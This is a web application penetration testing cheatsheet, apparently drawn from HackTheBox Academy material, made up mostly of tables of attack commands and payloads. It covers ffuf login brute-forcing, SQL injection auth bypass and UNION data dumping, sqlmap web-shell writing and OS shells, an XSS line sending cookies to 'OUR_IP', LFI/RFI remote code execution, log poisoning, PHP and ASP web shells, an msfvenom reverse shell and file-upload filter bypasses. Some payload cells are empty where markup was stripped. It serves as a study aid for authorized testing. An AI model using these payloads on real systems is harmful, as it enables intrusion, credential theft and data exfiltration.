Web Application Cheatsheet

February 25, 2021
cybersecurity
cheatsheet

Web application penetration testing is a critical security practice designed to identify and exploit vulnerabilities in web applications, simulating real-world attacks to assess their resilience against cyber threats. This method involves a thorough examination of the application’s architecture, from the user interface to the underlying codebase, to uncover potential security gaps that could be exploited by malicious actors. By mimicking the tactics, techniques, and procedures (TTPs) used by hackers, penetration testers provide actionable insights into an application’s security posture, helping organizations strengthen their defenses and comply with industry standards like PCI-DSS. This proactive approach not only enhances security but also reduces the risk of data breaches and financial losses, ensuring that sensitive data remains protected.

Checklist:

Client-side validation — Checks may not be replicated on the server
Database interaction — SQL injection
File uploading and downloading — Path traversal vulnerabilities, stored cross-site scripting
Display of user-supplied data — Cross-site scripting
Dynamic redirects — Redirection and header injection attacks
Social networking features — username enumeration, stored cross-site scripting
Login — Username enumeration, weak passwords, ability to use brute force
Multistage login — Logic flaws
Session state — Predictable tokens, insecure handling of tokens
Access controls — Horizontal and vertical privilege escalation
User impersonation functions — Privilege escalation
Use of cleartext communications — Session hijacking, capture of credentials and other sensitive data
Off-site links — Leakage of query string parameters in the Referer header
Interfaces to external systems — Shortcuts in the handling of sessions and/or access controls
Error messages — Information leakage
E-mail interaction — E-mail and/or command injection
Native code components or interaction — Buffer overflows
Use of third-party application components — Known vulnerabilities
Identifiable web server software — Common configuration weaknesses, known software bugs

For cloud pentesting check Pacu tool.

Enumeration

with raw HTTP request from BURP repeater:

POST /login.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=FUZZ

save it into req.txt and perform the login bruteforce:

ffuf -request req.txt -w /path/to/passwords.txt

To fuzz multiple parameters in the request, you can use multiple FUZZ keywords and specify the corresponding wordlists with the -w option. For example, if you want to fuzz both the username and password parameters, you can use the following command:

ffuf -request req.txt -w usernames.txt:UFUZZ -w passwords.txt:PFUZZ -fs 4242

This will use the usernames.txt wordlist for the UFUZZ keyword and the passwords.txt wordlist for the PFUZZ keyword.

How to filter:

-mc 200 match HTTP 200

-fs 4242 filter content size 4242

-fr “invalid” filter by responses matching regex “invalid”

-r Follow redirects, default to false

Spidering through BURP in 8080:

ffuf.exe -request .\req.txt -w .\directories.txt -x http://127.0.0.1:8080

Different modes (like in BURP Intruder)

ffuf.exe -request .\req.txt -request-proto http -w bytes.txt:BFUZZ -w passwords.txt:PFUZZ -mode pitchfork

Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)

Ffuf

Command	Description
ffuf -h	ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ	Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ	Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php	Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v	Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/	Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H ‘Host: FUZZ.academy.htb’ -fs xxx	VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx	Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d ‘FUZZ=key’ -H ‘Content-Type: application/x-www-form-urlencoded’ -fs xxx	Parameter Fuzzing - POST
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d ‘id=FUZZ’ -H ‘Content-Type: application/x-www-form-urlencoded’ -fs xxx	Value Fuzzing
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS	Crawl with:
-found folders in previous scan (dirlisting alias)
-cewl wordlist (generatelist alias)
-raft-* list for extensions, or known extension

Wordlists

Command	Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt	Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt	Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt
/opt/useful/SecLists/Discovery/DNS/namelist.txt	Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt	Parameters Wordlist
/opt/share/seclists/Discovery/Web-Content/raft-*	folders, words, extensions

Misc

Command	Description
sudo sh -c ’echo “SERVER_IP academy.htb” » /etc/hosts’	Add DNS entry
for i in $(seq 1 1000); do echo $i » ids.txt; done	Create Sequence Wordlist
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d ‘id=key’ -H ‘Content-Type: application/x-www-form-urlencoded’	curl w/ POST

HTTP

HTTP Verb Tampering

HTTP Method

HEAD
PUT
DELETE
OPTIONS
PATCH

Command	Description
-X OPTIONS	Set HTTP Method with Curl

IDOR

Identify IDORS

In URL parameters & APIs
In AJAX Calls
By understanding reference hashing/encoding
By comparing user roles

Command	Description
md5sum	MD5 hash a string
base64	Base64 encode a string

XXE

Code	Description
	Define External Entity to a URL
	Define External Entity to a file path
	Read PHP source code with base64 encode filter
">	Reading a file through a PHP error
">	Reading a file OOB exfiltration
&xxe;	Reference External Entity

SQLi

MySQL

Command	Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p	login to mysql database
SHOW DATABASES	List available databases
USE users	Switch to database
Tables
CREATE TABLE logins (id INT, …)	Add a new table
SHOW TABLES	List available tables in current database
DESCRIBE logins	Show table properties and columns
INSERT INTO table_name VALUES (value_1,..)	Add values to table
INSERT INTO table_name(column2, …) VALUES (column2_value, ..)	Add values to specific columns in a table
UPDATE table_name SET column1=newvalue1, … WHERE	Update table values
Columns
SELECT * FROM table_name	Show all columns in a table
SELECT column1, column2 FROM table_name	Show specific columns in a table
DROP TABLE logins	Delete a table
ALTER TABLE logins ADD newColumn INT	Add new column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn	Rename column
ALTER TABLE logins MODIFY oldColumn DATE	Change column datatype
ALTER TABLE logins DROP oldColumn	Delete column
Output
SELECT * FROM logins ORDER BY column_1	Sort by column
SELECT * FROM logins ORDER BY column_1 DESC	Sort by column in descending order
SELECT * FROM logins ORDER BY column_1 DESC, id ASC	Sort by two-columns
SELECT * FROM logins LIMIT 2	Only show first two results
SELECT * FROM logins LIMIT 1, 2	Only show first two results starting from index 2
SELECT * FROM table_name WHERE	List results that meet a condition
SELECT * FROM logins WHERE username LIKE ‘admin%’	List results where the name is similar to a given string

MySQL Operator Precedence

Division (/), Multiplication (*), and Modulus (%)
Addition (+) and Subtraction (-)
Comparison (=, >, <, <=, >=, !=, LIKE)
NOT (!)
AND (&&)
OR (||)

SQL Injection

Payload	Description
Auth Bypass
admin’ or ‘1’=‘1	Basic Auth Bypass
admin’)– -	Basic Auth Bypass With comments
Auth Bypass Payloads
Union Injection
’ order by 1– -	Detect number of columns using order by
cn’ UNION select 1,2,3– -	Detect number of columns using Union injection
cn’ UNION select 1,@@version,3,4– -	Basic Union injection
UNION select username, 2, 3, 4 from passwords– -	Union injection for 4 columns
DB Enumeration
SELECT @@version	Fingerprint MySQL with query output
SELECT SLEEP(5)	Fingerprint MySQL with no output
cn’ UNION select 1,database(),2,3– -	Current database name
cn’ UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA– -	List all databases
cn’ UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema=‘dev’– -	List all tables in a specific database
cn’ UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name=‘credentials’– -	List all columns in a specific table
cn’ UNION select 1, username, password, 4 from dev.credentials– -	Dump data from a table in another database
Privileges
cn’ UNION SELECT 1, user(), 3, 4– -	Find current user
cn’ UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user=“root”– -	Find if user has admin privileges
cn’ UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="‘root’@’localhost’"– -	Find if all user privileges
cn’ UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name=“secure_file_priv”– -	Find which directories can be accessed through MySQL
File Injection
cn’ UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4– -	Read local file
select ‘file written successfully!’ into outfile ‘/var/www/html/proof.txt’	Write a string to a local file
cn’ union select “”,’’, “”, "" into outfile ‘/var/www/html/shell.php’– -	Write a web shell into the base web directory

SQLMAP

Command	Description
sqlmap -h	View the basic help menu
sqlmap -hh	View the advanced help menu
sqlmap -u “http://www.example.com/vuln.php?id=1" –batch	Run SQLMap without asking for user input
sqlmap ‘http://www.example.com/' –data ‘uid=1&name=test’	SQLMap with POST request
sqlmap ‘http://www.example.com/' –data ‘uid=1*&name=test’	POST request specifying an injection point with an asterisk
sqlmap -r req.txt	Passing an HTTP request file to SQLMap
sqlmap … –cookie=‘PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c’	Specifying a cookie header
sqlmap -u www.target.com –data=‘id=1’ –method PUT	Specifying a PUT request
sqlmap -u “http://www.target.com/vuln.php?id=1" –batch -t /tmp/traffic.txt	Store traffic to an output file
sqlmap -u “http://www.target.com/vuln.php?id=1" -v 6 –batch	Specify verbosity level
sqlmap -u “www.example.com/?q=test" –prefix=”%’))” –suffix=”– -”	Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 –level=5	Specifying the level and risk
sqlmap -u “http://www.example.com/?id=1" –banner –current-user –current-db –is-dba	Basic DB enumeration
sqlmap -u “http://www.example.com/?id=1" –tables -D testdb	Table enumeration
sqlmap -u “http://www.example.com/?id=1" –dump -T users -D testdb -C name,surname	Table/row enumeration
sqlmap -u “http://www.example.com/?id=1" –dump -T users -D testdb –where=“name LIKE ‘f%’”	Conditional enumeration
sqlmap -u “http://www.example.com/?id=1" –schema	Database schema enumeration
sqlmap -u “http://www.example.com/?id=1" –search -T user	Searching for data
sqlmap -u “http://www.example.com/?id=1" –passwords –batch	Password enumeration and cracking
sqlmap -u “http://www.example.com/" –data=“id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE” –csrf-token=“csrf-token”	Anti-CSRF token bypass
sqlmap –list-tampers	List all tamper scripts
sqlmap -u “http://www.example.com/case1.php?id=1" –is-dba	Check for DBA privileges
sqlmap -u “http://www.example.com/?id=1" –file-read “/etc/passwd”	Reading a local file
sqlmap -u “http://www.example.com/?id=1" –file-write “shell.php” –file-dest “/var/www/html/shell.php”	Writing a file
sqlmap -u “http://www.example.com/?id=1" –os-shell	Spawning an OS shell

XSS

Code	Description
XSS Payloads
alert(window.origin)	Basic XSS Payload
	Basic XSS Payload
print()	Basic XSS Payload
	HTML-based XSS Payload
document.body.style.background = “#141d2b”	Change Background Color
document.body.background = “https://www.hackthebox.eu/images/logo-htb.svg"	Change Background Image
document.title = ‘HackTheBox Academy’	Change Website Title
document.getElementsByTagName(‘body’)[0].innerHTML = ’text’	Overwrite website’s main body
document.getElementById(‘urlform’).remove();	Remove certain HTML element
	Load remote script
new Image().src=‘http://OUR_IP/index.php?c=’+document.cookie	Send Cookie details to us
Commands
python xsstrike.py -u “http://SERVER_IP:PORT/index.php?task=test”	Run xsstrike on a url parameter
sudo nc -lvnp 80	Start netcat listener
sudo php -S 0.0.0.0:80	Start PHP server

Path traversal

Local File Inclusion

Command	Description
Basic LFI
/index.php?language=/etc/passwd	Basic LFI
/index.php?language=../../../../etc/passwd	LFI with path traversal
/index.php?language=/../../../etc/passwd	LFI with name prefix
/index.php?language=./languages/../../../../etc/passwd	LFI with approved path
LFI Bypasses
/index.php?language=….//….//….//….//etc/passwd	Bypass basic path traversal filter
/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64	Bypass filters with URL encoding
/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]	Bypass appended extension with path truncation (obsolete)
/index.php?language=../../../../etc/passwd%00	Bypass appended extension with null byte (obsolete)
/index.php?language=php://filter/read=convert.base64-encode/resource=config	Read PHP with base64 filter

Remote Code Execution

Command	Description
PHP Wrappers
/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id	RCE with data wrapper
curl -s -X POST –data ‘’ “http://<SERVER_IP>:/index.php?language=php://input&cmd=id”	RCE with input wrapper
curl -s “http://<SERVER_IP>:/index.php?language=expect://id”	RCE with expect wrapper
RFI
echo ‘’ > shell.php && python3 -m http.server <LISTENING_PORT>	Host web shell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id	Include remote PHP web shell
LFI + Upload
echo ‘GIF8’ > shell.gif	Create malicious image
/index.php?language=./profile_images/shell.gif&cmd=id	RCE with malicious uploaded image
echo ‘’ > shell.php && zip shell.jpg shell.php	Create malicious zip archive ‘as jpg’
/index.php?language=zip://shell.zip%23shell.php&cmd=id	RCE with malicious uploaded zip
php –define phar.readonly=0 shell.php && mv shell.phar shell.jpg	Create malicious phar ‘as jpg’
/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id	RCE with malicious uploaded phar
Log Poisoning
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd	Read PHP session parameters
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E	Poison PHP session with web shell
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id	RCE through poisoned PHP session
curl -s “http://<SERVER_IP>:/index.php” -A ‘’	Poison server log
/index.php?language=/var/log/apache2/access.log&cmd=id	RCE through poisoned PHP session

Misc

Command	Description
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u ‘http://<SERVER_IP>:/index.php?FUZZ=value’ -fs 2287	Fuzz page parameters
ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u ‘http://<SERVER_IP>:/index.php?language=FUZZ’ -fs 2287	Fuzz LFI payloads
ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u ‘http://<SERVER_IP>:/index.php?language=../../../../FUZZ/index.php’ -fs 2287	Fuzz webroot path
ffuf -w ./LFI-WordList-Linux:FUZZ -u ‘http://<SERVER_IP>:/index.php?language=../../../../FUZZ’ -fs 2287	Fuzz server configurations
LFI Wordlists
LFI-Jhaddix.txt

File Inclusion Functions

Function	Read Content	Execute	Remote URL
PHP
include()/include_once()	✅	✅	✅
require()/require_once()	✅	✅	❌
file_get_contents()	✅	❌	✅
fopen()/file()	✅	❌	❌
NodeJS
fs.readFile()	✅	❌	❌
fs.sendFile()	✅	❌	❌
res.render()	✅	✅	❌
Java
include	✅	❌	❌
import	✅	✅	✅
.NET
@Html.Partial()	✅	❌	❌
@Html.RemotePartial()	✅	❌	✅
Response.WriteFile()	✅	❌	❌
include	✅	✅	✅

File Upload

Web Shells

Web Shell	Description
<?php file_get_contents(’/etc/passwd’); ?>	Basic PHP File Read
<?php system(‘hostname’); ?>	Basic PHP Command Execution
<?php system($_REQUEST[‘cmd’]); ?>	Basic PHP Web Shell
<% eval request(‘cmd’) %>	Basic ASP Web Shell
msfvenom -p php/reverse_php LHOST=OUR_IP LPORT=OUR_PORT -f raw > reverse.php	Generate PHP reverse shell
PHP Web Shell	PHP Web Shell
PHP Reverse Shell	PHP Reverse Shell
Web/Reverse Shells	List of Web Shells and Reverse Shells

Bypasses

Command	Description
Client-Side Bypass
[CTRL+SHIFT+C]	Toggle Page Inspector
Blacklist Bypass
shell.phtml	Uncommon Extension
shell.pHp	Case Manipulation
PHP Extensions	List of PHP Extensions
ASP Extensions	List of ASP Extensions
Web Extensions	List of Web Extensions
Whitelist Bypass
shell.jpg.php	Double Extension
shell.php.jpg	Reverse Double Extension
%20, %0a, %00, %0d0a, /, ., ., …	Character Injection - Before/After Extension
Content/Type Bypass
Web Content-Types	List of Web Content-Types
Content-Types	List of All Content-Types
File Signatures	List of File Signatures/Magic Bytes

Limited Uploads

Potential Attack	File Types
XSS	HTML, JS, SVG, GIF
XXE/SSRF	XML, SVG, PDF, PPT, DOC
DoS	ZIP, JPG, PNG